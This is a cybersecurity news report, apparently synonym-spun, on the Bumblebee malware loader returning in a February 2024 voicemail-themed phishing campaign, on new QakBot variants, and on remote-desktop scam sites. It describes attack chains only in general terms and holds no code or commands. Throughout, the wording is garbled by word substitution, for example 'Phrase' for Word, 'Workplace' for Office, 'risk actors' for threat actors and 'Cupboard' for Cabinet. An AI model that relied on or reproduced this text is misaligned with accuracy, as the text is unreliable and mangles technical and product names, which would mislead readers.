The notorious malware loader and preliminary entry dealer generally known as Bumblebee has resurfaced after a four-month absence as a part of a brand new phishing marketing campaign noticed in February 2024.
Enterprise safety agency Proofpoint stated the exercise targets organizations within the U.S. with voicemail-themed lures containing hyperlinks to OneDrive URLs.
“The URLs led to a Phrase file with names corresponding to “ReleaseEvans#96.docm” (the digits earlier than the file extension diverse),” the corporate stated in a Tuesday report. “The Phrase doc spoofed the patron electronics firm Humane.”
Opening the doc leverages VBA macros to launch a PowerShell command to obtain and execute one other PowerShell script from a distant server that, in flip, retrieves and runs the Bumblebee loader.
Bumblebee, first noticed in March 2022, is especially designed to obtain and execute follow-on payloads corresponding to ransomware. It has been put to make use of by a number of crimeware risk actors that beforehand noticed delivering BazaLoader (aka BazarLoader) and IcedID.
It is also suspected to be developed by risk actors the Conti and TrickBot cybercrime syndicate as a substitute for BazarLoader. In September 2023, Intel 471 disclosed a Bumblebee distribution marketing campaign that employed Net Distributed Authoring and Versioning (WebDAV) servers to disseminate the loader.
The assault chain is notable for its reliance on macro-enabled paperwork within the assault chain, particularly contemplating Microsoft started blocking macros in Workplace information downloaded from the web by default beginning July 2022, prompting risk actors to modify and diversify their approaches.
The macro-based assault can also be markedly completely different from pre-hiatus campaigns through which the phishing emails got here with zipped LNK information bearing Bumblebee executables or HTML attachments that leveraged HTML smuggling to drop a RAR file, which exploited the WinRAR flaw tracked as CVE-2023-38831 to put in the loader.
The return of Bumblebee additionally coincides with the reappearance of recent variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed within the type of Microsoft Software program Installer (MSI) information.
“The .MSI drops a Home windows .cab (Cupboard) archive, which in flip accommodates a DLL,” cybersecurity agency Sophos stated on Mastodon. “The .MSI extracts the DLL from the .cab, and executes it utilizing shellcode. The shellcode causes the DLL to spawn a second copy of itself and inject the bot code into the second occasion’s reminiscence area.”
The most recent QakBot artifacts have been discovered to harden the encryption used to hide strings and different data, together with using a crypter malware referred to as DaveCrypter, making it more difficult to investigate. The brand new technology additionally reinstates the flexibility to detect whether or not the malware was working inside a digital machine or sandbox.
One other essential modification consists of encrypting all communications between the malware and the command-and-control (C2) server utilizing AES-256, a stronger methodology than was utilized in variations previous to the dismantling of QakBot’s infrastructure in late August 2023.
“The takedown of the QakBot botnet infrastructure was a victory, however the bot’s creators stay free, and somebody who has entry to QakBot’s unique supply code has been experimenting with new builds and testing the waters with these newest variants,” Andrew Brandt, principal researcher at Sophos X-Ops, stated.
“Some of the notable modifications contain a change to the encryption algorithm the bot makes use of to hide default configurations hardcoded into the bot, making it tougher for analysts to see how the malware operates; the attackers are additionally restoring beforehand deprecated options, corresponding to digital machine (VM) consciousness, and testing them out in these new variations.”
QakBot has additionally emerged because the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) however forward of different households like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.
The event comes as Malwarebytes revealed a brand new marketing campaign through which phishing websites mimicking monetary establishments like Barclays trick potential targets into downloading authentic distant desktop software program like AnyDesk to purportedly resolve non-existent points and in the end permit risk actors to realize management of the machine.
